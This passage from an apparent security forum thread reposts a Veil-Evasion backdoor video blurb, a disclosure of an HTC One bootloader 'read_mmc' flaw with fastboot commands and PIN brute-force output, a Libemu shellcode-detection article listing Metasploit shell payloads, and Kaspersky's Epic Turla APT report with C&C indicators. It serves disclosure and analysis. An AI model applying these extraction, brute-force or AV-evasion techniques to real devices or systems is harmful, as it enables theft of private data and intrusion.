Nytro

Veil Framework - Create A Undetected Backdoor Description: In this video you will learn how to use Veil Framework for penetration testing. This is a very great solution for AV Evasion. Now a days our first challenge is to bypass AV and this framework is all about AV Evasion. Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions. https://www.veil-framework.com/framework/veil-evasion/ Sursa: Veil Framework - Create A Undetected Backdoor

Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password By cedric » Wednesday 23 July 2014, 11:50 - Forensics TL;DR This article deals with the presence of the « read_mmc » command in the HTC One phone. Our target phone had Android 4.2.2 and HBOOT 1.54.0000. This vulnerability has been reported to HTC in February 2014 and has been fixed with the Kit Kat (4.4.2) upgrade released in March 2014. Since then, HTC has told us it will be addressed into operators ROMs. We are happy to say that it has been patched in all of them except one. As a consequence, we have decided to release the information about it. The « read_emmc » command had already been disclosed in a previous article for the HTC Desire Z, released in 2011. This command allows an attacker with physical access to read the flash memory of the phone, and possibly get sensitive information such as SMS messages, contacts and so on. Furthermore, this command allows an attacker to bruteforce the PIN/passcode in an automatic way that would not be possible without it. It opens an additional breach against users that define easily-guessable PIN/passcodes (such as 4-digit PIN). It is often the case because this same PIN/passcode is also used to unlock the phone on a daily basis. Finally, the attack presented in this article also applies to HTC One devices where Full Disk Encryption (FDE) is enabled, i.e. when the phone is protected with Android encryption. The “read_mmc” command appears to be a debug function that is not on every HTC phone. In our opinion, this command should not appear in any released phone. This articles details the strong security mechanisms (AES encryption, correct key size, salt) used in Android FDE for the HTC One and the problematic context: the « read_mmc » debug command and a weak PIN/password allow an attacker to bruteforce it "offline" (from a computer) and access user protected data. Accessing the flash memory The HTC One is powered down and plugged to our computer. Then it is put in fastboot mode. This can be done by holding VOL DOWN + POWER buttons then releasing POWER while holding VOL DOWN. Then, we can switch from HBOOT to fastboot mode. From there, we can use the “fastboot” binary from Android SDK to read the flash memory. The command has the following format: command format: read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show] The arguments are defined as such: first parameter tells where to read from. “emmc” to read the flash. “sd” to read the sdcard start: offset (in blocks i.e. 512-byte units) in the raw flash memory #blocks: number of blocks to read #blocks/read: number of blocks to read at a time show: set to 1 to display the result An advised user may have noticed it is called "read_mmc" here instead of the older "read_emmc" command but its purpose is the same. To read the first sector, one can use the following command: $ fastboot oem read_mmc emmc 0 1 1 1 ... (bootloader) reading sector 0 ~ 0 (bootloader) 0 ... (bootloader) 0 (bootloader) DF (bootloader) FF (bootloader) 3 (bootloader) 0 (bootloader) 20 (bootloader) E0 (bootloader) 9F (bootloader) 3 (bootloader) 55 (bootloader) AA (bootloader) read sector done average = 172 OKAY [ 0.310s] finished. total time: 0.311s We can see it has lots of zeros at the beginning (more than 400 bytes) and it ends with the “55 AA” magic bytes, being the magic for a partition table. Using an ADB shell on the device, we see the userdata partition is the “mmcblk0p37” block device and starts at the 6422528th sector. It corresponds to the “ext4” mounted partition under Android. shell[COLOR=#000000][B]@[/B][/COLOR]android[COLOR=#666666][I]# cat /proc/emmc[/I][/COLOR] dev: [COLOR=#c20cb9][B]size[/B][/COLOR] erasesize name ... mmcblk0p37: [COLOR=#000000]680000000[/COLOR] 00000200 [COLOR=#ff0000]"userdata"[/COLOR] shell[COLOR=#000000][B]@[/B][/COLOR]android:[COLOR=#666666][I]# cat /sys/block/mmcblk0/mmcblk0p37/start[/I][/COLOR] [COLOR=#000000]6422528[/COLOR] shell[COLOR=#000000][B]@[/B][/COLOR]android:[COLOR=#666666][I]# mount[/I][/COLOR] ... [COLOR=#000000][B]/[/B][/COLOR]dev[COLOR=#000000][B]/[/B][/COLOR]block[COLOR=#000000][B]/[/B][/COLOR]mmcblk0p37 [COLOR=#000000][B]/[/B][/COLOR]data ext4 rw,nosuid,nodev,noatime,discard,noauto_da_alloc,[COLOR=#007800]data[/COLOR]=ordered [COLOR=#000000]0[/COLOR] [COLOR=#000000]0[/COLOR] Consequently, an attacker can use the “read_mmc” command and the previous offset (6422528 and after) in the flash memory to read any sector within the userdata partition even if the user defined a PIN/passcode to protect his phone. $ fastboot oem read_mmc emmc 6422530 1 1 1 ... (bootloader) reading sector 6422530 ~ 6422530 (bootloader) 0 ... (bootloader) 2F (bootloader) 64 (bootloader) 61 (bootloader) 74 (bootloader) 61 ... (bootloader) read sector done average = 146 OKAY [ 0.359s] finished. total time: 0.359s The “2F 64 61 74 61” sequence of bytes is the “/data” ascii string that is located at the beginning of the userdata partition. As we already detailed with the previous article, the first idea we got was to realize a dump of the whole userdata partition from the flash memory. However, it is really slow and it would take several days or even months. As a side note, the HTC One phone does not discharge when in HBOOT/fastboot modes and plugged to a computer. So it is theoretically “easier” to realize a whole dump as it was with the HTC Desire Z. Another approach is to use FUSE (Filesystem in Userspace) to mount the userdata partition remotely (over USB) from a computer. Mounting the partition only requires reading a few sectors and is significantly faster. We can then access any file. Indeed, this also works for the HTC One. Bypassing the Android Full Disk Encryption (FDE) When working on the HTC Desire Z, there was no “Full Disk Encryption” (FDE) option available because it was Android 2.x at that time and encryption is not supported before Android 4.x for mobile phones. We decided to analyze if there was a way to bypass FDE using the “read_mmc” vulnerability. Thomas Cannon has published back in 2012 at Defcon his excellent slides showing how FDE is working for default Android (based on Android source code, a.k.a AOSP) and scripts to both bruteforce the PIN/passcode and decrypt userdata sectors. At that time, he has been working on the Google Nexus S, which is a phone built by Google itself. Consequently, it uses the default Android sources and has not been modified by any manufacturer. This is different with our HTC One since this is HTC who built it from its own version of modified AOSP and hardware. We decided to encrypt the device by enabling it in “Storage > Phone storage encryption”. After dumping all the partitions and diffing them with a dump we made before encryption, we easily notice the “extra” partition is the FDE header used to store the encrypted master key. As detailed in Thomas slides, the PIN/passcode defined by the user is used in conjunction with the encrypted master key (between {...} below) and salt (between [...] below) to derive the decrypted master key. This decrypted master key is then used to decrypt each sector of the userdata partition. We can also infer from the header the algorithm used for the /data sector decryption (aes-cbc-essiv:sha256). $ hexdump -C extra 00000000 c4 b1 b5 d0 01 00 00 00 68 00 00 00 00 00 00 00 |........h.......| 00000010 20 00 00 00 00 00 00 00 00 00 40 03 00 00 00 00 | ........ @[URL="https://rstforums.com/forum/member.php?u=83354"].....[/URL]| 00000020 00 00 00 00 61 65 73 2d 63 62 63 2d 65 73 73 69 |....aes-cbc-essi| 00000030 76 3a 73 68 61 32 35 36 00 00 00 00 00 00 00 00 |v:sha256........| 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000060 00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c |.............T@.| 00000070 b4 c1 e4 91 69 10 4b 55 2e 47 64 31 13 52 ad 2d |....i.KU.Gd1.R.-| 00000080 bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00 |..B.............| 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000a0 00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39 |..........4....9| 000000b0 0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00 |.J..............| 000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000200 Note: for further details on the master key derivation and data decryption internals, we will definitely advise you to have a look at Thomas’ slides. Since we located where the encryption header is, we easily get the offset in the flash memory where it is stored. shell@android# cat /proc/emmc dev: size erasesize name ... mmcblk0p27: 00010000 00000200 "extra" shell@android:# cat /sys/block/mmcblk0/mmcblk0p27/start 586799 Then, we can double-check that our userdata partition is encrypted, as the first bytes amusingly tell it: “This is an encrypted device:)”. This is some kind of addition made by HTC for the HTC One specifically. They can do so because the first bytes are not used in a default ext4 partition. Everything else is random bytes, as expected. shell@android:# ./busybox hexdump -C /dev/block/mmcblk0p37 -n 64 00000000 54 68 69 73 20 69 73 20 61 6e 20 65 6e 63 72 79 |This is an encry| 00000010 70 74 65 64 20 64 65 76 69 63 65 3a 29 6f c3 a0 |pted device:)o..| 00000020 26 bc 76 ed a8 77 ef 6a 95 28 32 ab 24 ce 8d 58 |&.v..w.j.(2.$..X| 00000030 91 fe 8e 14 9e 81 05 a4 28 65 64 3c 1b e2 11 56 |........(ed<...V| 00000040 We can then check that we can access this header and the encrypted userdata partition from fastboot “read_mmc” command, which is indeed possible. $ fastboot oem read_mmc emmc 586799 1 1 1 From this, we can build a small script that will read the FDE header (located in the “extra” partition) and the first sector of the “userdata” partition and bruteforce them locally from our computer. [COLOR=#666666][I]# python bruteforce_htcone_over_reademmc.py[/I][/COLOR] oem read_mmc emmc 6422528 1 1 1 oem read_mmc emmc 586799 1 1 1 Footer File : extra Magic : 0xD0B5B1C4 Major Version : 1 Minor Version : 0 Footer Size : 104 bytes Flags : 0x00000000 Key Size : 256 bits Failed Decrypts: 0 Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400 Salt : 0xC71F34809709FD390B4A91D9D9D800CD [COLOR=#660033]----------------[/COLOR] Trying to Bruteforce Password... please [COLOR=#7a0874][B]wait[/B][/COLOR] Found PIN[COLOR=#000000][B]![/B][/COLOR]: 0000 Saving decrypted master key to 'keyfile' We can easily bruteforce any 4-digit PIN in a matter of minutes with a regular PC. This takes a little bit of time since the master key derivation needs 2000 iterations, but it is definitely possible. Additionally, we save the decrypted master key for further analysis. The PIN/passcode setup by the user is used for both: decrypting the phone when it is switched on (1) accessing the phone after a given delay during a regular day use (2) Even if the user wants to protect his phone with a complex PIN/password for (1), he will definitely want to use a simple one for (2) because he will use it a lot to access his phone. Consequently, the scenario of bruteforcing the PIN/passcode assuming that it is a 4-digit PIN (and not a complex one such as having digits and letters) makes sense. Moreover, encrypting one phone using schemes instead of PIN/password is not supported in Android for now. We can add that it would not help against bruteforce since the scheme is stored as a sequence of numbers that do not repeat. Mounting the userdata encrypted partition (remotely over USB) Since an attacker is able to bruteforce the PIN/passcode easily using what we explained above, he is able to switch on the phone normally and write the found PIN/passcode to bypass the lock screen. Then, he is able to enable ADB and dump everything he wants. We do not need to go further. However, as a need for completeness (and also because it is always interesting to know how to mount an encrypted userdata partition), we will detail how to do it. Basically, this consists of using cryptsetup (version >= 1.60 in order to support the plain type) specifying the “plain” type, the decryption algorithms (aes-cbc-essiv:sha256) and the “keyfile” holding our previously decrypted master key. [COLOR=#666666][I]# mkdir mnt[/I][/COLOR] [COLOR=#666666][I]# losetup /dev/loop0 userdata.img[/I][/COLOR] [COLOR=#666666][I]# cryptsetup –type plain open –c aes-cbc-essiv:sha256 –d keyfile /dev/loop0 userdata[/I][/COLOR] [COLOR=#666666][I]# mount /dev/mapper/userdata mnt[/I][/COLOR] In our case, we "even" can do it over USB using the “read_mmc” command. All the tools to replay these scenarios are released into our github repository. Again, we would like to thank HTC security team for their support and by patching this vulnerability in Kit Kat upgrade. Sursa: Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password - Sogeti ESEC Lab

Shellcode Detection and Emulation with Libemu Introduction Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/Honeypot systems for emulating the x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, analyze shellcode inside malicous .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article. The very first thing we can do is download Libemu via Git with the following command: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# git clone git://git.carnivore.it/libemu.git [/TD] [/TR] [/TABLE] If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 AnsiC code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it’s evident that about 50k lines of code has been written. The installation instructions can be found at [1], which is why we won’t describe them in this article. We can also install the Pylibemu, so we can interact with Libemu directly from Python. Creating the Shellcode Let’s create a simple text case with Metasploit to see how Libemu works. First, we have to create a shellcode with msfpayload, which is a command-line tool specifically built to generate and output various versions of shellcode. Let’s first present all Linux payloads by grepping for the “linux” keyword through msfpayload command output. # msfpayload -l 2>&1 | grep linux linux/armle/adduser Create a new user with UID 0 linux/armle/exec Execute an arbitrary command linux/armle/shell/bind_tcp Listen for a connection, dup2 socket in r12, then execve linux/armle/shell/reverse_tcp Connect back to the attacker, dup2 socket in r12, then execve linux/armle/shell_bind_tcp Connect to target and spawn a command shell linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc/shell_find_port Spawn a shell on an established connection linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc64/shell_find_port Spawn a shell on an established connection linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/exec Execute an arbitrary command linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/adduser Create a new user with UID 0 linux/x86/chmod Runs chmod on specified file with specified mode linux/x86/exec Execute an arbitrary command linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server linux/x86/meterpreter/bind_nonx_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server linux/x86/meterpreter/reverse_nonx_tcp Connect back to the attacker, Staged meterpreter server linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged) linux/x86/shell/bind_nonx_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged) linux/x86/shell/reverse_nonx_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute

Merita ascultat. "Ennnumereitor"

The Epic Turla Operation Solving some of the mysteries of Snake/Uroburos By GReAT on August 7, 2014. Technical Appendix with IOCs Executive Summary Over the last 10 months, Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call "Epic Turla". The attackers behind Epic Turla have infected several hundred computers in more than 45 countries, including government institutions, embassies, military, education, research and pharmaceutical companies. The attacks are known to have used at least two zero-day exploits: CVE-2013-5065 - Privilege escalation vulnerability in Windows XP and Windows 2003 CVE-2013-3346 - Arbitrary code-execution vulnerability in Adobe Reader We also observed exploits against older (patched) vulnerabilities, social engineering techniques and watering hole strategies in these attacks. The primary backdoor used in the Epic attacks is also known as "WorldCupSec", "TadjMakhal", "Wipbot" or "Tavdig". When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to "rescue" each other if communications are lost with one of the backdoors. Once the attackers obtain the necessary credentials without the victim noticing, they deploy the rootkit and other extreme persistence mechanisms. The attacks are still ongoing as of July 2014, actively targeting users in Europe and the Middle East. Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services subscribers. Contact: intelreports@kaspersky.com The Epic Turla attacks The attacks in this campaign fall into several different categories depending on the vector used in the initial compromise: Spearphishing e-mails with Adobe PDF exploits (CVE-2013-3346 + CVE-2013-5065) Social engineering to trick the user into running malware installers with ".SCR" extension, sometimes packed with RAR Watering hole attacks using Java exploits (CVE-2012-1723), Flash exploits (unknown) or Internet Explorer 6,7,8 exploits (unknown) Watering hole attacks that rely on social engineering to trick the user into running fake "Flash Player" malware installers The attackers use both direct spearphishing and watering hole attacks to infect their victims. Watering holes (waterholes) are websites of interest to the victims that have been compromised by the attackers and injected to serve malicious code. So far we haven't been able to locate any e-mail used against the victims, only the attachments. The PDF attachments do not show any "lure" to the victim when opened, however, the SCR packages sometime show a clean PDF upon successful installation. Some of known attachment names used in the spearphishing attacks are: ???? ????.rar (translation from Arabic: "Geneva conference.rar") NATO position on Syria.scr Note_?107-41D.pdf Talking Points.scr border_security_protocol.rar Security protocol.scr Program.scr In some cases, these filenames can provide clues about the type of victims the attackers are targeting. The watering hole attacks Currently, the Epic attackers run a vast network of watering holes that target visitors with surgical precision. Some of the injected websites include: The website of the City Hall of Pinor, Spain A site promoting entrepreneurship in the border area of Romania Palestinian Authority Ministry of Foreign Affairs In total, we observed more than 100 injected websites. Currently, the largest number of injected sites is in Romania. Here's a statistic on the injected websites: The distribution is obviously not random, and it reflects some of the interests of the attackers. For instance, in Romania many of the infected sites are in the Mures region, while many of the Spanish infected sites belong to local governments (City Hall). Most of the infected sites use the TYPO3 CMS (see: TYPO3 - The Enterprise Open Source CMS), which could indicate the attackers are abusing a specific vulnerability in this publishing platform. Injected websites load a remote JavaScript into the victim's browser: The script "sitenavigatoin.js" is a Pinlady-style browser and plugin detection script, which in turn, redirects to a PHP script sometimes called main.php or wreq.php. Sometimes, the attackers register the .JPG extension with the PHP handler on the server, using "JPG" files to run PHP scripts: Profiling script The main exploitation script "wreq.php", "main.php" or "main.jpg" performs a numbers of tasks. We have located several versions of this script which attempt various exploitation mechanisms. One version of this script attempts to exploit Internet Explorer versions 6, 7 and 8: Internet Explorer exploitation script Unfortunately, the Internet Explorer exploits have not yet been retrieved. Another more recent version attempts to exploit Oracle Sun Java and Adobe Flash Player: Java and Flash Player exploitation scripts Although the Flash Player exploits couldn't be retrieved, we did manage to obtain the Java exploits: [TABLE=width: 60%] [TR] [TD=width: 30%]Name[/TD] [TD=width: 70%]MD5[/TD] [/TR] [TR] [TD]allj.html[/TD] [TD]536eca0defc14eff0a38b64c74e03c79[/TD] [/TR] [TR] [TD]allj.jar[/TD] [TD]f41077c4734ef27dec41c89223136cf8[/TD] [/TR] [TR] [TD]allj64.html[/TD] [TD]15060a4b998d8e288589d31ccd230f86[/TD] [/TR] [TR] [TD]allj64.jar[/TD] [TD]e481f5ea90d684e5986e70e6338539b4[/TD] [/TR] [TR] [TD]lstj.jar[/TD] [TD]21cbc17b28126b88b954b3b123958b46[/TD] [/TR] [TR] [TD]lstj.html[/TD] [TD]acae4a875cd160c015adfdea57bd62c4[/TD] [/TR] [/TABLE] The Java files exploit a popular vulnerability, CVE-2012-1723, in various configurations. The payload dropped by these Java exploits is the following: [TABLE] [TR] [TD] MD5: d7ca9cf72753df7392bfeea834bcf992[/TD] [/TR] [/TABLE] The Java exploit use a special loader that attempts to inject the final Epic backdoor payload into explorer.exe. The backdoor extracted from the Java exploits has the following C&C hardcoded inside: [TABLE] [TR] [TD] www.arshinmalalan[.]com/themes/v6/templates/css/in.php[/TD] [/TR] [/TABLE] This C&C is still online at the moment although it redirects to a currently suspended page at "hxxp://busandcoachdirectory.com[.]au". For a full list of C&C servers, please see the Appendix. The Epic Turla attackers are extremely dynamic in using exploits or different methods depending on what is available at the moment. Most recently, we observed them using yet another technique coupled with watering hole attacks. This takes advantage of social engineering to trick the user into running a fake Flash Player (MD5: 030f5fdb78bfc1ce7b459d3cc2cf1877): In at least one case, they tried to trick the user into downloading and running a fake Microsoft Security Essentials app (MD5: 89b0f1a3a667e5cd43f5670e12dba411): The fake application is signed by a valid digital certificate from Sysprint AG: Serial number: ?00 c0 a3 9e 33 ec 8b ea 47 72 de 4b dc b7 49 bb 95 Thumbprint: ?24 21 58 64 f1 28 97 2b 26 22 17 2d ee 62 82 46 07 99 ca 46 Valid signature from Sysprint AG on Epic dropper This file was distributed from the Ministry of Foreign Affairs of Tajikistan's website, at "hxxp://mfa[.]tj/upload/security.php". The file is a .NET application that contains an encrypted resource. This drops the malicious file with the MD5 7731d42b043865559258464fe1c98513. This is an Epic backdoor which connects to the following C&Cs, with a generic internal ID of 1156fd22-3443-4344-c4ffff: [TABLE] [TR] [TD] hxxp://homaxcompany[.]com/components/com_sitemap/ hxxp://www.hadilotfi[.]com/wp-content/themes/profile/[/TD] [/TR] [/TABLE] A full list with all the C&C server URLs that we recovered from the samples can be found in the technical Appendix. The Epic command-and-control infrastructure The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality. The huge network commanded by the Epic Turla attackers serves multiple purposes. For instance, the motherships function as both exploitation sites and command and control panels for the malware. Here's how the big picture looks like: Epic Turla lifecycle The first level of command and control proxies generally talk to a second level of proxies, which in turn, talk to the "mothership" server. The mothership server is generally a VPS, which runs the Control panel software used to interact with the victims. The attackers operate the mothership using a network of proxies and VPN servers for anonymity reasons. The mothership also work as the exploitation servers used in the watering hole attacks, delivering Java, IE or fake applications to the victim. We were able to get a copy of one of the motherships, which provided some insight into the operation. It runs a control panel which is password protected: Epic mothership control panel login Once logged into the Control panel, the attackers can see a general overview of the system including the number of interesting potential targets: Epic control panel status overview A very interesting file on the servers is task.css, where the attackers define the IP ranges they are interested in. To change the file, they are using the "Task editor" from the menu. Depending on the "tasks", they will decide whether to infect the visitors or not. In this case, we found they targeted two ranges belonging to: "Country A" - Federal Government Network "Country B" - Government Telecommunications and Informatics Services Network It should be noted though, the fact that the attackers were targeting these ranges doesn't necessarily mean they also got infected. Some other unknown IPs were also observed in the targeting schedules. There is also an "except.css" file where attackers log the reasons they didn't try to exploit certain visitors. There are three possible values: TRY DON'T TRY -> Version of the browser and OS does not meet the conditions DON'T TRY -> (2012-09-19 10:02:04) - checktime These are the "don't meet the conditions" reasons observed in the logs: Windows 7 or 2008 R2 MSIE 8.0 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E) Adobe Shockwave 11.5.1.601 Adobe Flash 10.3.181.14 Adobe Reader 10.1.0.0 Win Media Player 12.0.7601.17514 Quick Time null MS Word null Java null The Epic / Tavdig / Wipbot backdoor For this first stage of the attack, the threat actor uses a custom backdoor. In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult. The CVE-2013-5065 exploit allows the backdoor to achieve administrator privileges on the system and run unrestricted. This exploit only works on unpatched Microsoft Windows XP systems. Other known detection names for the backdoor is Trojan.Wipbot (Symantec) or Tavdig. The main backdoor is about 60KB in size and implements a C&C protocol on top of normal HTTP requests. The communication protocol uses requests in the C&C replies, which the malware decrypts and processes. The replies are sent back to the C&C through the same channel. The malware behavior is defined by a configuration block. The configuration block usually contains two hard-coded C&C URLs. He have also seen one case where the configuration block contains just one URL. The configuration can also be updated on the fly by the attackers, via the C&C. The backdoor attempts to identify the following processes and, if found, it will terminate itself: tcpdump.exe windump.exe ethereal.exe wireshark.exe ettercap.exe snoop.exe dsniff.exe It contains an internal unique ID, which is used to identify the victim to the C&C. Most samples, especially old ones, have the ID 1156fd22-3443-4344-c4ffff. Once a victim is confirmed as "interesting", the attackers upload another Epic backdoor which has a unique ID used to control this specific victim. During the first C&C call, the backdoor sends a pack with the victim's system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware. Through monitoring, we were able to capture a large amount of commands sent to the victims by the attackers, providing an unique view into this operation. Here's a look at one of the encrypted server replies: Once a victim is infected and "checks in" with the server, the attackers send a template of commands: Next, the attackers try to move through the victim's network using pre-defined or collected passwords: Listing all .doc files recursively is also a common "theme": In total, we have decoded several hundreds of these command packages delivered to the victims, providing an unique insight into the inner workings of the attackers. In addition to generic searches, some very specific lookups have been observed as well. These include searches for: *NATO*.msg eu energy dialogue*.* EU*.msg Budapest*.msg In this case, the attackers were interested to find e-mails related to "NATO", "Energy Dialogue within European Unition" and so on. For some of the C&C servers, the attackers implemented RSA encryption for the C&C logs, which makes it impossible to decrypt them. This scheme was implemented in April 2014. Lateral movement and upgrade to more sophisticated backdoors Once a victim is compromised, the attackers upload several tools that are used for lateral movement. One such tool observed in the attacks and saved as "C:\Documents and Settings\All users\Start Menu\Programs\Startup\winsvclg.exe" is: [TABLE] [TR] [TD] Name: winsvclg.exe MD5: a3cbf6179d437909eb532b7319b3dafe Compiled: Tue Oct 02 13:51:50 2012[/TD] [/TR] [/TABLE] This is a keylogger tool that creates %temp%\~DFD3O8.tmp. Note: the filename can change across victims. On one Central Asian government's Ministry of Foreign Affairs victim system, the filename used was "adobe32updt.exe". In addition to these custom tools, we observed the usage of standard administration utilities. For instance, another tool often uploaded by the attackers to the victim's machine is "winrs.exe": [TABLE] [TR] [TD] Name: winrs.exe MD5: 1369fee289fe7798a02cde100a5e91d8 [/TD] [/TR] [/TABLE] This is an UPX packed binary, which contains the genuine "dnsquery.exe" tool from Microsoft, unpacked MD5: c0c03b71684eb0545ef9182f5f9928ca. In several cases, an interesting update has been observed -- a malware from a different, yet related family. [TABLE] [TR] [TD] Size: 275,968 bytes MD5: e9580b6b13822090db018c320e80865f Compiled: Thu Nov 08 11:05:35 2012[/TD] [/TR] [/TABLE] another example: [TABLE] [TR] [TD] Size: 218,112 bytes MD5: 071d3b60ebec2095165b6879e41211f2 Compiled: Thu Nov 08 11:04:39 2012[/TD] [/TR] [/TABLE] This backdoor is more sophisticated and belongs to the next level of cyber-espionage tools called the "Carbon system" or Cobra by the Turla attackers. Several plugins for the "Carbon system" are known to exist. Decoded configuration for e9580b6b13822090db018c320e80865f Note: the command and control servers www.losguayaberos[.]com and thebesttothbrushes[.]com have been sinkholed by Kaspersky Lab. Other packages delivered to the victims include: [TABLE] [TR] [TD] MD5: c7617251d523f3bc4189d53df1985ca9 MD5: 0f76ef2e6572befdc2ca1ca2ab15e5a1[/TD] [/TR] [/TABLE] These top level packages deploy both updated Epic backdoors and Turla Carbon system backdoors to confirmed victims, effectively linking the Epic and Turla Carbon operations together. The Turla Carbon dropper from these packages has the following properties: [TABLE] [TR] [TD] MD5: cb1b68d9971c2353c2d6a8119c49b51f [/TD] [/TR] [/TABLE] This is called internally by the authors "Carbon System", part of the "Cobra" project, as it can be seen from the debug path inside: This acts as a dropper for the following modules, both 32 and 64 bit: [TABLE=width: 70%] [TR] [TD=width: 70%]MD5[/TD] [TD=width: 30%]Resource number[/TD] [/TR] [TR] [TD]4c1017de62ea4788c7c8058a8f825a2d[/TD] [TD]101[/TD] [/TR] [TR] [TD]43e896ede6fe025ee90f7f27c6d376a4[/TD] [TD]102[/TD] [/TR] [TR] [TD]e6d1dcc6c2601e592f2b03f35b06fa8f[/TD] [TD]104[/TD] [/TR] [TR] [TD]554450c1ecb925693fedbb9e56702646[/TD] [TD]105[/TD] [/TR] [TR] [TD]df230db9bddf200b24d8744ad84d80e8[/TD] [TD]161[/TD] [/TR] [TR] [TD]91a5594343b47462ebd6266a9c40abbe[/TD] [TD]162[/TD] [/TR] [TR] [TD]244505129d96be57134cb00f27d4359c[/TD] [TD]164[/TD] [/TR] [TR] [TD]4ae7e6011b550372d2a73ab3b4d67096[/TD] [TD]165[/TD] [/TR] [/TABLE] The Carbon system is in essence an extensible platform, very similar to other attack platforms such as the Tilded platform or the Flame platform. The plugins for the Carbon system can be easily recognized as they always feature at least two exports named: ModuleStart ModuleStop Carbon system plugin with characteristic exports Several Epic backdoors appear to have been designed to work as Carbon system plugins as well - they require a specialized loader to start in victim systems that do not have the Carbon system deployed. Some modules have artifacts which indicate the Carbon system is already at version 3.x, although the exact Carbon system version is very rarely seen in samples: The author of the Carbon module above can be also seen in the code, as "gilg", which also authored several other Turla modules. We are planning to cover the Turla Carbon system with more details in a future report. Language artifacts The payload recovered from one of the mothership servers (at newsforum.servehttp[.]com/wordpress/wp-includes/css/img/upload.php, MD5: 4dc22c1695d1f275c3b6e503a1b171f5, Compiled: Thu Sep 06 14:09:55 2012) contains two modules, a loader/injector and a backdoor. Internally, the backdoor is named "Zagruzchick.dll": The word "Zagruzchick" means "boot loader" in Russian. The Control panel for the Epic motherships also sets the language to codepage "1251": Codepage 1251 is commonly used to render Cyrillic characters. There are other indications that the attackers are not native English language speakers: Password it´s wrong! Count successful more MAX File is not exists File is exists for edit The sample e9580b6b13822090db018c320e80865f that was delivered to several Epic victims as an upgraded backdoor, has the compilation code page language set to "LANG_RUSSIAN". The 